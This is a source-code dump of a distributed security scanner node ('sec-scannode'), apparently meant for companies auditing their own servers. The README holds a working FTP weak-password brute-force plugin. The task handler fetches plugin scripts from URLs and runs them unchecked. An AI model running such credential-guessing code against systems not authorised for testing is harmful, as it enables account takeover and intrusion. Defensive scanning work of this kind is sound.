├── Dockerfile ├── Factories ├── DictFactory.py ├── __init__.py └── readme.md ├── HeartBeatHandler.py ├── Models ├── ExceptionResult.py ├── TaskModel.py ├── heartmodel.py ├── readme.md └── taskresultmodel.py ├── README.MD ├── ScanHandler.py ├── ScanHandler_old.py ├── ScanResult.py ├── TaskStatus.py ├── Utils ├── HeartMessage.py ├── TimeUtil.py ├── mylog.py └── readme.md ├── VulRun.py ├── config.py ├── helpers ├── __init__.py ├── filehelper.py ├── readme.md └── redishelper.py ├── logger.conf ├── logs └── readme.md ├── main.py ├── mlogging ├── __init__.py └── readme.md ├── node_run.sh ├── pipmanage.py ├── recovermq.py ├── requirements.txt ├── scan.py ├── scripts ├── Docker远程无密码调用[2375]_f64908f5-46df-4c37-9809-3f6c03a5df0a.py ├── FTP弱口令扫描[21]_8bddf610-6580-4ece-a96e-d7f5eebe5e94.py ├── Java反序列化代码执行[8080]_fc328c6f-a103-4152-8660-de9f2e195911.py ├── Redis弱口令扫描[6379]_44da507f-5141-425b-b565-651f53eadfdc.py ├── SSH弱口令扫描[22]_49145b74-a221-4a41-baf0-03b2351e4634.py ├── WebServer任意文件读取[80]_c04faae4-33b6-45be-bb7c-6cace5d5d4eb.py ├── dockerdemo.py ├── fastcgi目录读取_14e0818f-cafd-4fc4-a984-260aa0016765.py ├── ftpweakscan.py └── readme.md └── test.py /Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.8-alpine 2 | MAINTAINER yourname youremai@mail.com 3 | RUN sed -i 's/dl-cdn.alpinelinux.org/mirrors.aliyun.com/g' /etc/apk/repositories 4 | RUN apk add make gcc musl-dev libffi-dev openssl-dev git vim 5 | # 设置时区为上海 6 | RUN apk add tzdata && cp /usr/share/zoneinfo/Asia/Shanghai /etc/localtime \ 7 | && echo "Asia/Shanghai" > /etc/timezone 8 | RUN mkdir /xn-secnode && mkdir /xn-secnode/logs && rm -rf /xn-secnode/* 9 | WORKDIR /xn-secnode 10 | LABEL ver=1.5.1 11 | RUN git clone https://github.com/sec-scannode.git /xn-secnode/ 12 | RUN pip install -r requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple 13 | RUN echo "* * * * * root find /xn-secnode/logs -name 'xnsec.log*' -and -mtime +10 -type f |xargs rm -f" >>/etc/crontabs/root 14 | RUN chmod a+x /xn-secnode/node_run.sh 15 | 16 | ENV REDIS_ENV=0:pass811220@localhost:6379 17 | ENV HEART_RATE=60 18 | 19 | CMD ["sh","-c", "/xn-secnode/node_run.sh"] 20 | 21 | -------------------------------------------------------------------------------- /Factories/DictFactory.py: -------------------------------------------------------------------------------- 1 | import json 2 | from collections import Iterable 3 | 4 | class BaseParser: 5 | def __init__(self, type:str, sep:str, info:str): 6 | self.type = type 7 | self.sep = sep 8 | self.info = info 9 | 10 | def get_dict(self): 11 | return [] 12 | 13 | 14 | class DictFactory: 15 | @staticmethod 16 | def get_parser(json_obj) -> BaseParser: 17 | type = json_obj['type'] 18 | sep = '' 19 | if 'separate' in json_obj: 20 | sep = json_obj['separate'] 21 | info = json_obj['info'] 22 | ob = None 23 | if type == 'text': 24 | ob = TextParser(type,sep,info) 25 | elif type == 'separate': 26 | ob = SplitParser(type,sep,info) 27 | elif type == 'json': 28 | ob = JosnParser(type,sep,info) 29 | else: 30 | ob = BaseParser(type, sep, info) 31 | return ob 32 | 33 | 34 | class TextParser(BaseParser): 35 | def get_dict(self): 36 | return self.info 37 | 38 | 39 | class SplitParser(BaseParser): 40 | def get_dict(self): 41 | tmpdict = self.info.split(self.sep) 42 | return list(filter(None, tmpdict)) 43 | 44 | 45 | class JosnParser(BaseParser): 46 | def get_dict(self): 47 | obj = json.loads(self.info, encoding='utf-8') 48 | return obj 49 | 50 | if __name__ == "__main__": 51 | tmp = {} 52 | tmp["key1"] = "123" 53 | if '123' in tmp: 54 | print("yes k") 55 | if 'key1' in tmp: 56 | print("yes keys") -------------------------------------------------------------------------------- /Factories/__init__.py: -------------------------------------------------------------------------------- 1 | from Factories.DictFactory import DictFactory 2 | from Factories.DictFactory import BaseParser -------------------------------------------------------------------------------- /Factories/readme.md: -------------------------------------------------------------------------------- 1 | some factory module 2 | -------------------------------------------------------------------------------- /HeartBeatHandler.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | import pika, sys 3 | from config import myconfig 4 | from Utils import HeartMessage 5 | import json, traceback 6 | import time 7 | from helpers import redishelper 8 | from Utils import mylog 9 | log = mylog.Log().getInstance() 10 | 11 | 12 | def HeartMonitor(): 13 | while True: 14 | try: 15 | __sendheartmessage() 16 | except Exception as err: 17 | print('send heart failed. detail - ', err) 18 | time.sleep(myconfig['default'].HEART_RATE) 19 | 20 | 21 | def __sendheartmessage(info=''): 22 | """ 给心跳订阅者发送redis消息 """ 23 | heart_msg = json.dumps(obj=HeartMessage.getbody(info=info).__dict__, ensure_ascii=False) 24 | redishelper.send_heart(heart_msg, myconfig['default'].MQ_HEART_EXCHANGE) 25 | 26 | 27 | def __sendheartmessage_mq(info=''): 28 | """ 给心跳订阅者发送订阅消息 """ 29 | credentials = pika.PlainCredentials(myconfig['default'].MQ_USER, myconfig['default'].MQ_PASS) 30 | connection = pika.BlockingConnection(pika.ConnectionParameters(host=myconfig['default'].MQ_URL, 31 | port=myconfig['default'].MQ_PORT, 32 | credentials=credentials)) 33 | channel = connection.channel() 34 | # 声明exchange,由exchange指定消息在哪个队列传递,如不存在,则创建。durable = True 代表exchange持久化存储,False 非持久化存储 35 | channel.exchange_declare(exchange=myconfig['default'].MQ_HEART_EXCHANGE, durable=True, exchange_type="fanout") 36 | # 向队列插入数值 routing_key是队列名。delivery_mode = 2 声明消息在队列中持久化,delivery_mod = 1 消息非持久化。routing_key 不需要配置 37 | 38 | channel.basic_publish(exchange=myconfig['default'].MQ_HEART_EXCHANGE, routing_key='', 39 | body=json.dumps(obj=HeartMessage.getbody(info=info).__dict__, ensure_ascii=False), 40 | properties=pika.BasicProperties(delivery_mode=2)) 41 | 42 | # log.info("send heart message success.") 43 | # print('heart:',json.dumps(obj=HeartMessage.getbody().__dict__, ensure_ascii=False)) 44 | connection.close() 45 | 46 | 47 | if __name__ == "__main__": 48 | # HeartMonitor() 49 | __sendheartmessage() 50 | -------------------------------------------------------------------------------- /Models/ExceptionResult.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | 3 | """ 发送到MQ失败的消息体列表,会被重试 """ 4 | failed_list = set() -------------------------------------------------------------------------------- /Models/TaskModel.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | 3 | 4 | class TaskModel: 5 | def __init__(self, server, timespan, active): 6 | self.server = server 7 | self.timespan = timespan 8 | self.active = active 9 | -------------------------------------------------------------------------------- /Models/heartmodel.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | 3 | 4 | class HeartModel: 5 | def __init__(self, server, timespan, active, info): 6 | self.server = server 7 | self.timespan = timespan 8 | self.active = active 9 | self.info = info 10 | -------------------------------------------------------------------------------- /Models/readme.md: -------------------------------------------------------------------------------- 1 | some models 2 | -------------------------------------------------------------------------------- /Models/taskresultmodel.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | 3 | 4 | class TaskResultModel: 5 | def __init__(self, taskid, taskstatus, scriptstatus, result, tasktime, node=''): 6 | self.taskid = taskid 7 | self.taskstatus = taskstatus 8 | self.scriptstatus = scriptstatus 9 | self.result = result 10 | self.tasktime = tasktime 11 | self.node = node 12 | -------------------------------------------------------------------------------- /README.MD: -------------------------------------------------------------------------------- 1 | # SEC-分布式资产安全扫描(弱口令、系统漏洞、WEB漏洞扫描) 2 | ---------- 3 | **SEC (SEC Is Elastic Controller)** 可用于企业对服务器资源安全进行扫描排查,可控性强、可停止运行中的扫描任务、支持分布式多节点部署,更快的扫描进度 + 节点执行信息动态反馈,快速定位漏洞。 4 | 5 | 作者开源此应用的目的是为了方便企业管理自身的服务器资产,提高安全性,以避免不必要的损失;同时也能与大家一起探讨学习,请使用者不要用于非法目的,自觉遵守 [**《中华人民共和国网络安全法》**](http://www.cac.gov.cn/2016-11/07/c_1119867116.htm) ,一起为祖国的网络安全做贡献。 6 | 7 | ---------- 8 | 9 | ## 流程演示视频 10 | 11 | [![](https://smallcham.github.io/static/img/sec-demo.png)](https://smallcham.github.io/static/video/sec-demo.mp4) 12 | 13 | ---------- 14 | ## 系统组成介绍 15 | 16 | SEC共分为三个项目 17 | * [前端WEB项目](https://github.com/smallcham/sec-admin-web.git) 18 | * [中央控制系统](https://github.com/smallcham/sec-admin.git) 19 | * [任务执行系统](https://github.com/wanzywang/sec-scannode.git) 20 | 21 | > **前端WEB系统** 22 | 使用动静分离的方式部署, WEB页面部分使用 Vue + ElementUI 编写,所有的UI都在这个项目中。 23 | 24 | > **中央控制系统** 25 | 使用Python3 + Flask编写,负责录入资产的端口服务发现、任务执行统计、资产管理、数据字典、漏洞插件管理、用户管理、扫描任务下发以及同步等后台实现,添加的IP会立即进行端口服务以及系统探测。 26 | 27 | > **任务执行系统** 28 | 使用Python3编写,负责处理执行下发的扫描任务,并回馈处理结果。 29 | 执行系统以进程为执行单位,可在同一台机器部署多个进程服务,**支持多节点分布式部署**。 30 | 31 | ## 部署方式(共有三种部署方式) 32 | 33 | ### 一、 一键部署 34 | 35 | 一键部署已经将所有服务以及启动脚本打包成docker镜像, 可以直接运行,数据库以及相关公用服务直接打包在容器内部,不支持分布式节点扩展,可作为体验测试,**不建议直接作为生产环境使用**。 36 | 1. 首先需要安装Docker服务,Ubuntu可使用以下指令直接安装(**已经安装Docker服务并启动的直接调到第 3 步**) 37 | 38 | Ubuntu: 39 | ``` 40 | sudo apt-get -y install docker.io 41 | ``` 42 | 43 | CentOS: 44 | ``` 45 | sudo yum -y install docker.io 46 | ``` 47 | 2. 启动Docker服务(**已经安装Docker服务并启动的直接调到第 3 步**) 48 | 49 | ``` 50 | sudo service docker start 51 | ``` 52 | 53 | 3. 启动SEC服务(**指令中8793是后台访问端口, 可根据需求修改为其他端口,NODE_COUNT 为执行节点启动的进程数,默认为3**) 54 | 55 | ``` 56 | docker run -d -p 8793:80 --name sec --env NODE_COUNT=3 smallcham/sec:all-in-0.1 && docker logs -f sec --tail 10 57 | ``` 58 | 59 | 4. 服务启动后初始用户为:root, 初始密码将会打印在控制台,可在登录后修改。 60 | 61 | ### 二、使用容器分布式部署(推荐) 62 | 63 | 1. 首先需要安装Docker服务,Ubuntu可使用以下指令直接安装(**已经安装Docker服务并启动的直接调到第 3 步**) 64 | 65 | Ubuntu: 66 | ``` 67 | sudo apt-get -y install docker.io 68 | ``` 69 | 70 | CentOS: 71 | ``` 72 | sudo yum -y install docker.io 73 | ``` 74 | 75 | 2. 启动Docker服务(**已经安装Docker服务并启动的直接调到第 3 步**) 76 | 77 | ``` 78 | sudo service docker start 79 | ``` 80 | 81 | 3. 使用容器启动并初始化MySQL数据库 82 | 83 | ``` 84 | docker run --name sec-mysql -p 3306:3306 -e MYSQL_ROOT_PASSWORD=secpassword -d mysql:5.7 85 | ``` 86 | 87 | ``` 88 | wget https://raw.githubusercontent.com/smallcham/sec-admin/master/pack/create_db.sql 89 | ``` 90 | 91 | 等待半分钟,mysql启动完毕后执行 92 | 93 | ``` 94 | docker exec -i sec-mysql sh -c 'exec mysql -uroot -p"$MYSQL_ROOT_PASSWORD"' < /你下载的目录/create_db.sql 95 | ``` 96 | 97 | > 如果你要使用自己现有的数据库可以直接将[create_db.sql](https://github.com/smallcham/sec-admin/blob/master/pack/create_db.sql)中的SQL执行进行初始化 98 | 99 | 4. 使用容器启动Redis 100 | 101 | ``` 102 | docker run -p 6379:6379 --name sec-redis -d redis 103 | ``` 104 | 105 | > 你也可以使用自己现有的Redis 106 | 107 | 5. 使用容器启动SEC控制系统 108 | 109 | ``` 110 | docker run -d -p 启动端口:80 --name sec --env HOST=http://部署机器的IP:启动端口(启动后用这个URL在浏览器访问) --env DB_URL=MySQL用户名:MySQL密码@MySQLIP:数据库端口(一默认是3306)/sec --RDS_URL=Redis库号(默认写0):Redis密码(没有密码可以不写)@RedisIP:Redis端口(默认是6379) -v ~/sec-script:/var/www/html/sec-admin/static/plugin/usr smallcham/sec:core-0.1 && docker logs -f sec --tail 10 111 | ``` 112 | 113 | > 例如 114 | 115 | ``` 116 | docker run -d -p 8793:80 --name sec --env HOST=http://192.168.0.107:8793 --env DB_URL=root:abcd1234@192.168.0.107:3306/sec --env RDS_URL=0:abcd1234@192.168.0.107:6379 -v ~/sec-script:/var/www/html/sec-admin/static/plugin/usr smallcham/sec:core-0.1 && docker logs -f sec --tail 10 117 | ``` 118 | 119 | 120 | 6. 登录SEC管理系统 121 | 使用节点添加功能生成并拷贝到终端执行节点安装指令,节点支持分布式,只要保证部署服务器与控制系统以及Redis之间互通即可,当然也可以直接在同一台服务器部署,详细操作请查看[演示视频](https://smallcham.github.io/static/video/sec-demo.mp4) 122 | 123 | ### 三、不使用容器本地部署(以下示例基于Ubuntu) 124 | 125 | 1. 安装MySQL、Redis、Nodejs、npm、Nginx、Python3、pip3 126 | 各种类的系统内的安装方法都大同小异, 这里就不作详细介绍。 127 | 2. 编译Web页面项目 128 | ``` 129 | * git clone https://github.com/smallcham/sec-admin-web.git 130 | * cd 你的项目路径/sec-admin-web/ 131 | * npm install 132 | * npm run build 133 | * ln -s 你的项目路径/sec-admin-web/dist 你的Nginx网站目录/ 134 | ``` 135 | 编译好的静态文件在项目的 dist 目录 136 | 3. 运行SEC核心控制系统 137 | ``` 138 | * git clone https://github.com/smallcham/sec-admin.git 139 | * cd 你的项目路径/sec-admin/ 140 | * pip install -r requirements.txt // 找不到pip的尝试 pip3 install -r requirements.txt 141 | * 打开项目路径下的 src/model/enum.py 修改Env类 默认LOCAL判断内的数据库以及Redis配置为你安装的配置 142 | * nohup gunicorn -w 10 app:flask_app 143 | ``` 144 | 4. 配置Nginx访问 145 | > 以下配置模板供参考,端口或者目录不一样请自行修改。 146 | 147 | ``` 148 | server { 149 | listen 80 default_server; 150 | listen [::]:80 default_server; 151 | 152 | root /var/www/html; 153 | 154 | index index.html index.htm; 155 | 156 | server_name _; 157 | 158 | location / { 159 | root /var/www/html/dist; 160 | try_files $uri $uri/ 404; 161 | } 162 | 163 | location /api/ { 164 | proxy_pass http://localhost:8000/; 165 | } 166 | 167 | location /static/plugin/usr/ { 168 | proxy_pass http://localhost:8000; 169 | } 170 | } 171 | ``` 172 | 配置好后记得重启nginx服务 173 | 5. 启动执行节点 174 | ``` 175 | * git clone https://github.com/wanzywang/sec-scannode.git 176 | * cd 你的项目路径/sec-scannode/ 177 | * pip install -r requirements.txt // 找不到pip的尝试 pip3 install -r requirements.txt 178 | * 打开项目根目录的 config.py 修改redis配置为你安装的ip以及密码 179 | * python -u scan.py 180 | ``` 181 | 182 | ## 功能介绍 183 | 184 | ### 插件说明 185 | 186 | SEC支持添加自定义扫描插件脚本,目前仅支持Python语言,格式如下。 187 | ``` 188 | //target参数为扫描目标, 可以是IP也可以是域名,具体取决于资产录入的是ip还是域名 189 | def do(target): 190 | if 发现漏洞: 191 | return True, '发现漏洞,原因***' 192 | else: 193 | return False, '' 194 | ``` 195 | 196 | 可参考以下FTP弱口令扫描脚本 197 | 其中 SEC_USER_NAME、SEC_PASSWORD 为字典功能中录入的Key值,扫描节点会自动将数据字典中添加的内容以设置的分隔符或JSON格式转化为数组或字典,可以通过字典Key值直接引入使用。 198 | 199 | ``` 200 | from ftplib import FTP 201 | 202 | def do(target): 203 | port = 21 204 | time_out_flag = 0 205 | for user in SEC_USER_NAME: 206 | print(user) 207 | for pwd in SEC_PASSWORD: 208 | print(pwd) 209 | try: 210 | ftp = FTP(target, timeout=3) 211 | ftp.connect(target, port, 5) 212 | if ftp.login(user, pwd).startswith('2'): 213 | return True, '用户: ' + user + ' 存在弱口令: ' + pwd 214 | except Exception as e: 215 | if not str(e).startswith('530'): 216 | print(e) 217 | if e.args[0] == 113 or e.args[0] == 111 or 'timed out' in str(e): 218 | time_out_flag += 1 219 | if time_out_flag > 2: 220 | print('connection timeout , break the loop .') 221 | return False, '' 222 | else: 223 | print(e) 224 | return False, '' 225 | ``` 226 | 227 | ------ 228 | 229 | # docker run -h 可以设置hostname 230 | #使用帮助 231 | ### buildzip.sh 可以生成代码的zip包 232 | ### docker build -t xn-secnode . 233 | ### docker run -d -h slavenode-1 --env MQ_ENV=**** xn-secnode 234 | 235 | 236 | #打包需要同时更新dockerfile和 build.sh的版本号 -------------------------------------------------------------------------------- /ScanHandler.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | import pika, json, datetime, traceback,os, requests, sys, multiprocessing,socket 3 | import pika.exceptions, time 4 | import ScanResult 5 | from Models import TaskModel, taskresultmodel 6 | from Utils import TimeUtil 7 | from config import myconfig 8 | from Utils import mylog 9 | from helpers import redishelper 10 | import VulRun 11 | log = mylog.Log().getInstance() 12 | 13 | 14 | """ 15 | 从待扫描队列读取扫描任务,进行扫描 16 | 改成了redis读取任务 17 | """ 18 | 19 | 20 | def receive(): 21 | log.info("receive......") 22 | while True: 23 | try: 24 | task = redishelper.getonetask() 25 | taskid = task['id'] 26 | plugin_url = task['url'] 27 | module_name = task['name'] 28 | ip = task['ip'] 29 | 30 | if not os.path.exists(os.path.join(os.path.abspath(__file__), 'scripts', module_name + '.py')): 31 | try: 32 | r = requests.get(plugin_url, timeout=10) 33 | if r.status_code == 200: 34 | with open(os.path.join(os.path.dirname(os.path.abspath("__file__")), 'scripts', module_name + ".py"), 35 | "wb") as f: 36 | f.write(r.content) 37 | else: 38 | log.error("下载脚本失败:{}".format(r)) 39 | ScanResult.sendmsg(taskid, "FAIL", False, "下载脚本失败:{}".format(r), node=socket.gethostname()) 40 | continue 41 | except Exception as re: 42 | log.error("收取消息后,处理失败:{},\ndetail-{}".format(re, traceback.format_exc())) 43 | ScanResult.sendmsg(taskid, "FAIL", False, "下载脚本失败:{}".format(re), node=socket.gethostname()) 44 | continue 45 | 46 | ScanResult.sendmsg(taskid, "RUNNING", False, "", node=socket.gethostname()) 47 | # 返回running 48 | run_proc = multiprocessing.Process(target=vul_handler, args=(module_name, ip, taskid)) 49 | run_proc.start() 50 | # 等待结束 51 | while True: 52 | run_proc.join(timeout=60) 53 | if run_proc.is_alive(): 54 | if redishelper.needstop(taskid): 55 | log.info("has task cancle event. {}".format(taskid)) 56 | run_proc.terminate() 57 | run_proc.join() 58 | log.info("{} : task cancel........") 59 | ScanResult.sendmsg(taskid, "CANCEL", False, "",socket.gethostname()) 60 | else: 61 | log.info("不需要提前结束,继续等待检查完成......") 62 | continue 63 | else: 64 | break 65 | except Exception as err: 66 | log.error("task basic_consume error:", traceback.format_exc()) 67 | ScanResult.sendmsg(taskid, "FAIL", False, str(err), socket.gethostname()) 68 | time.sleep(30) 69 | 70 | 71 | def vul_handler(module, ip, taskid): 72 | log.info(" start " + module + " ") 73 | # 准备进入实际脚本开始检查 74 | task_suc, scan_status, scan_result = VulRun.check(module, ip) 75 | log.info("end {}, {}, {}".format(module, ip, " scan...")) 76 | if task_suc: 77 | task_suc = "FINISH" 78 | else: 79 | task_suc = "FAIL" 80 | ScanResult.sendmsg(taskid, task_suc, scan_status, scan_result,socket.gethostname()) 81 | 82 | 83 | def rec_callback(ch, method, prop, body): 84 | try: 85 | taskid = "unknown" 86 | scan_status = False # 脚本检查是否认为有异常 True= 有异常 87 | task_suc = False # 任务执行是否有异常 88 | body_msg = body.decode() 89 | log.info("receive task: ", body) 90 | 91 | msg = json.loads(body_msg, encoding='utf-8') 92 | taskid = msg['id'] 93 | plugin_url = msg['url'] 94 | module_name = msg['name'] 95 | ip = msg['ip'] 96 | 97 | if not os.path.exists(os.path.join(os.path.abspath(__file__), 'scripts', module_name+'.py')): 98 | r = requests.get(plugin_url) 99 | with open(os.path.join(os.path.dirname(os.path.abspath("__file__")), 'scripts', module_name + ".py"), "wb") as f: 100 | f.write(r.content) 101 | # 准备进入实际脚本开始检查 102 | task_suc, scan_status, scan_result = VulRun.check(module_name, ip) 103 | print("end to ", module_name, " scan...") 104 | except Exception as err: 105 | print('receive deal failed. ', err) 106 | task_suc = False 107 | scan_result = "执行失败," + str(err) 108 | 109 | ch.basic_ack(delivery_tag=method.delivery_tag) 110 | if task_suc: 111 | task_suc = "FINISH" 112 | else: 113 | task_suc = "FAIL" 114 | # 准备返回json模型 115 | rt = taskresultmodel.TaskResultModel(taskid=taskid, taskstatus=task_suc, scriptstatus=scan_status, 116 | result=scan_result, 117 | tasktime=TimeUtil.datetime_to_strtime(datetime.datetime.now()), 118 | node=socket.gethostname()) 119 | # 给结果队列发送消息 120 | ScanResult.sendtorabbitmq(json.dumps(obj=rt.__dict__, ensure_ascii=False)) 121 | 122 | 123 | def scanmonitor(): 124 | """ 监听扫描队列 """ 125 | try: 126 | receive() 127 | except Exception as err: 128 | print("listen scan task failed. ", err) 129 | 130 | 131 | if __name__ == "__main__": 132 | log.info(("{}".format(b'asfasasf'))) 133 | res = requests.get("https://www.baidu.com") 134 | log.info("{}".format(res)) 135 | # p = multiprocessing.Process(target=test) 136 | # p.start() 137 | # receive() 138 | # time.sleep(60) 139 | # r = requests.get("http://localhost/test.py") 140 | # with open(os.path.join(os.path.dirname(os.path.abspath("__file__")), 'scripts', "test" + ".py"), "wb") as f: 141 | # f.write(r.content) 142 | #print(os.path.join(os.path.abspath(__file__), 'scripts', "module_name" + '.py')) 143 | # receive() 144 | -------------------------------------------------------------------------------- /ScanHandler_old.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | import pika, json, datetime, traceback,os, requests, sys,socket 3 | import pika.exceptions 4 | import ScanResult 5 | from Models import TaskModel, taskresultmodel 6 | from Utils import TimeUtil 7 | from config import myconfig 8 | from Utils import mylog 9 | import VulRun 10 | log = mylog.Log().getInstance() 11 | 12 | """ 从待扫描队列读取扫描任务,进行扫描 """ 13 | 14 | 15 | def receive(): 16 | while True: 17 | try: 18 | credentials = pika.PlainCredentials(myconfig['default'].MQ_USER, myconfig['default'].MQ_PASS) 19 | connect = pika.BlockingConnection(pika.ConnectionParameters(host=myconfig['default'].MQ_URL, 20 | port=myconfig['default'].MQ_PORT, 21 | credentials=credentials, 22 | heartbeat=0)) 23 | ch = connect.channel() 24 | ch.basic_qos(prefetch_count=1) 25 | ch.queue_declare(myconfig['default'].MQ_URL, durable=True) 26 | try: 27 | ch.basic_consume(queue=myconfig['default'].MQ_SCAN_QUEUE, on_message_callback=rec_callback, 28 | auto_ack=False) 29 | log.info("task listening rabbitmq..") 30 | ch.start_consuming() 31 | except pika.exceptions.ChannelClosedByBroker as err: 32 | log.error("listen mq failed,", traceback.format_exc()) 33 | finally: 34 | ch.close() 35 | connect.close() 36 | except Exception as err: 37 | log.error("task basic_consume error:", traceback.format_exc()) 38 | 39 | 40 | def rec_callback(ch, method, prop, body): 41 | try: 42 | taskid = "unknown" 43 | scan_status = False # 脚本检查是否认为有异常 True= 有异常 44 | task_suc = False # 任务执行是否有异常 45 | body_msg = body.decode() 46 | log.info("receive task: ", body) 47 | 48 | msg = json.loads(body_msg, encoding='utf-8') 49 | taskid = msg['id'] 50 | plugin_url = msg['url'] 51 | module_name = msg['name'] 52 | ip = msg['ip'] 53 | 54 | if not os.path.exists(os.path.join(os.path.abspath(__file__), 'scripts', module_name+'.py')): 55 | r = requests.get(plugin_url) 56 | with open(os.path.join(os.path.dirname(os.path.abspath("__file__")), 'scripts', module_name + ".py"), "wb") as f: 57 | f.write(r.content) 58 | # 准备进入实际脚本开始检查 59 | task_suc, scan_status, scan_result = VulRun.check(module_name, ip) 60 | print("end to ", module_name, " scan...") 61 | except Exception as err: 62 | print('receive deal failed. ', err) 63 | task_suc = False 64 | scan_result = "执行失败," + str(err) 65 | 66 | ch.basic_ack(delivery_tag=method.delivery_tag) 67 | if task_suc: 68 | task_suc = "FINISH" 69 | else: 70 | task_suc = "FAIL" 71 | # 准备返回json模型 72 | rt = taskresultmodel.TaskResultModel(taskid=taskid, taskstatus=task_suc, scriptstatus=scan_status, 73 | result=scan_result, 74 | tasktime=TimeUtil.datetime_to_strtime(datetime.datetime.now()), 75 | node=socket.gethostname()) 76 | # 给结果队列发送消息 77 | ScanResult.sendtorabbitmq(json.dumps(obj=rt.__dict__, ensure_ascii=False)) 78 | 79 | 80 | def scanmonitor(): 81 | """ 监听扫描队列 """ 82 | try: 83 | receive() 84 | except Exception as err: 85 | print("listen scan task failed. ", err) 86 | 87 | 88 | if __name__ == "__main__": 89 | log.info("hahah",b'sdfsdf') 90 | # r = requests.get("http://localhost/test.py") 91 | # with open(os.path.join(os.path.dirname(os.path.abspath("__file__")), 'scripts', "test" + ".py"), "wb") as f: 92 | # f.write(r.content) 93 | #print(os.path.join(os.path.abspath(__file__), 'scripts', "module_name" + '.py')) 94 | # receive() 95 | -------------------------------------------------------------------------------- /ScanResult.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | import pika, traceback, json, datetime 3 | from config import myconfig 4 | from Models import ExceptionResult 5 | from Utils import mylog 6 | from Models import taskresultmodel 7 | from Utils import TimeUtil 8 | from helpers import redishelper 9 | log = mylog.Log().getInstance() 10 | 11 | 12 | def sendtoredis(body): 13 | if not redishelper.send_result(body, myconfig['default'].MQ_RESULT_EXCHANGE): 14 | ExceptionResult.failed_list.add(body) 15 | 16 | 17 | def sendtorabbitmq(body): 18 | """给 结果 交换路由 发送消息 """ 19 | try: 20 | credentials = pika.PlainCredentials(myconfig['default'].MQ_USER, myconfig['default'].MQ_PASS) 21 | connection = pika.BlockingConnection(pika.ConnectionParameters(host=myconfig['default'].MQ_URL, 22 | port=myconfig['default'].MQ_PORT, 23 | credentials=credentials)) 24 | channel = connection.channel() 25 | # 声明exchange,由exchange指定消息在哪个队列传递,如不存在,则创建。durable = True 代表exchange持久化存储,False 非持久化存储 26 | channel.exchange_declare(exchange=myconfig['default'].MQ_RESULT_EXCHANGE, durable=True, 27 | exchange_type=myconfig['default'].MQ_RESULT_EXCHNAGE_TYPE) 28 | # 向队列插入数值 routing_key是队列名。delivery_mode = 2 声明消息在队列中持久化,delivery_mod = 1 消息非持久化。routing_key 不需要配置 29 | channel.basic_publish(exchange=myconfig['default'].MQ_RESULT_EXCHANGE, routing_key='', 30 | body=body, properties=pika.BasicProperties(delivery_mode=2)) 31 | 32 | log.info("send result msg success. {},{}".format(myconfig['default'].MQ_RESULT_EXCHANGE, body)) 33 | connection.close() 34 | except Exception as err: 35 | log.error("send result failed, {},{}".format(err, traceback.format_exc())) 36 | ExceptionResult.failed_list.add(body) 37 | log.warning("add send failed msg to fail_list, wait retry.") 38 | 39 | 40 | def sendmsg(taskid, taskstatus, scriptstatus, result, node): 41 | rt = taskresultmodel.TaskResultModel(taskid=taskid, taskstatus=taskstatus, scriptstatus=scriptstatus, 42 | result=result, 43 | tasktime=TimeUtil.datetime_to_strtime(datetime.datetime.now()), 44 | node=node) 45 | # 给结果队列发送消息 46 | sendtoredis(json.dumps(obj=rt.__dict__, ensure_ascii=False)) 47 | -------------------------------------------------------------------------------- /TaskStatus.py: -------------------------------------------------------------------------------- 1 | 2 | class TaskStatus: 3 | RUN_ABLE = 'RUN_ABLE' 4 | RUNNING = 'RUNNING' 5 | FINISH = 'FINISH' 6 | FAIL = 'FAIL' 7 | STOP = "STOP" -------------------------------------------------------------------------------- /Utils/HeartMessage.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | import datetime 3 | import socket 4 | 5 | from Models import heartmodel 6 | from Utils import TimeUtil 7 | from Utils import mylog 8 | log = mylog.Log().getInstance() 9 | 10 | 11 | def getbody(info='') -> heartmodel.HeartModel: 12 | """ 生成心跳消息体 """ 13 | server = socket.gethostname() 14 | local_time, local_strtime, local_timestamp = TimeUtil.current_datetime() 15 | active = True 16 | c = heartmodel.HeartModel(server=server, timespan=str(local_timestamp), active=active, info=info) 17 | return c 18 | -------------------------------------------------------------------------------- /Utils/TimeUtil.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | 3 | import time 4 | 5 | from datetime import datetime 6 | 7 | 8 | def timestamp_to_strtime(timestamp): 9 | """将 13 位整数的毫秒时间戳转化成本地普通时间 (字符串格式) 10 | :param timestamp: 13 位整数的毫秒时间戳 (1456402864242) 11 | :return: 返回字符串格式 {str}'2016-02-25 20:21:04.242000' 12 | """ 13 | local_str_time = datetime.fromtimestamp(timestamp / 1000.0).strftime('%Y-%m-%d %H:%M:%S.%f') 14 | return local_str_time 15 | 16 | 17 | def timestamp_to_datetime(timestamp): 18 | """将 13 位整数的毫秒时间戳转化成本地普通时间 (datetime 格式) 19 | :param timestamp: 13 位整数的毫秒时间戳 (1456402864242) 20 | :return: 返回 datetime 格式 {datetime}2016-02-25 20:21:04.242000 21 | """ 22 | local_dt_time = datetime.fromtimestamp(timestamp / 1000.0) 23 | return local_dt_time 24 | 25 | 26 | def datetime_to_strtime(datetime_obj): 27 | """将 datetime 格式的时间 (含毫秒) 转为字符串格式 28 | :param datetime_obj: {datetime}2016-02-25 20:21:04.242000 29 | :return: {str}'2016-02-25 20:21:04.242' 30 | """ 31 | local_str_time = datetime_obj.strftime("%Y-%m-%d %H:%M:%S.%f") 32 | return local_str_time 33 | 34 | 35 | def datetime_to_timestamp(datetime_obj): 36 | """将本地(local) datetime 格式的时间 (含毫秒) 转为毫秒时间戳 37 | :param datetime_obj: {datetime}2016-02-25 20:21:04.242000 38 | :return: 13 位的毫秒时间戳 1456402864242 39 | """ 40 | local_timestamp = int(time.mktime(datetime_obj.timetuple()) * 1000.0 + datetime_obj.microsecond / 1000.0) 41 | return local_timestamp 42 | 43 | 44 | def strtime_to_datetime(timestr): 45 | """将字符串格式的时间 (含毫秒) 转为 datetiem 格式 46 